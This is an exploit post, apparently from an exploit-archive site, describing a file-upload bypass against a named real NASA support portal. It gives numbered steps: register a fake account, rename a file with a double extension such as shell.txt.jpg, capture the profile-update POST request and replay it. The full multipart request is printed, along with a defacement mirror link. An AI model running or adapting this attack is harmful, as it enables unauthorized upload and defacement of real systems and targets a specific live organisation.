NASA Submit Upload Exploit

2018.08.07
tr God3err (TR) tr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

NASA Submit Upload Exploit Founder : God3err 1) Open site https://support.earthdata.nasa.gov/ 2) Create fake account 3) Install Live HTTP Headers and HTTP Requester 4) Open Live HTTP Header and rename index.html.jpg 5) Upload this file 6) Copy POST Request 7) Paste HTTP Requester and POST :)) POST https://support.earthdata.nasa.gov/index.php?/Base/UserAccount/ProfileSubmit -----------------------------25505821327763\r\n Content-Disposition: form-data; name="salutation"\r\n \r\n 0\r\n -----------------------------25505821327763\r\n Content-Disposition: form-data; name="fullname"\r\n \r\n asfsafa safsafs\r\n -----------------------------25505821327763\r\n Content-Disposition: form-data; name="userorganization"\r\n \r\n \r\n -----------------------------25505821327763\r\n Content-Disposition: form-data; name="userdesignation"\r\n \r\n \r\n -----------------------------25505821327763\r\n Content-Disposition: form-data; name="phone"\r\n \r\n \r\n -----------------------------25505821327763\r\n Content-Disposition: form-data; name="profileimage"; filename="shell.txt.jpg(EDIT)"\r\n Content-Type: image/jpeg\r\n \r\n Exploited By God3err\r\n NASA Shell Explo!t\r\n -----------------------------25505821327763\r\n Content-Disposition: form-data; name="sendemailtoall"\r\n \r\n 1\r\n -----------------------------25505821327763\r\n Content-Disposition: form-data; name="emaillist[]"\r\n \r\n ******@*****.com(EDIT)\r\n -----------------------------25505821327763\r\n Content-Disposition: form-data; name="_csrfhash"\r\n \r\n xca9fo1wjcsd4o3zwdtzlo5x3j3lio7v\r\n -----------------------------25505821327763--\r\n Success E.g http://overflowzone.com/mirror/84863/ Video : https://youtu.be/2pL0_bEXhNc Website : god3err.pw

References:

https://youtu.be/2pL0_bEXhNc


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top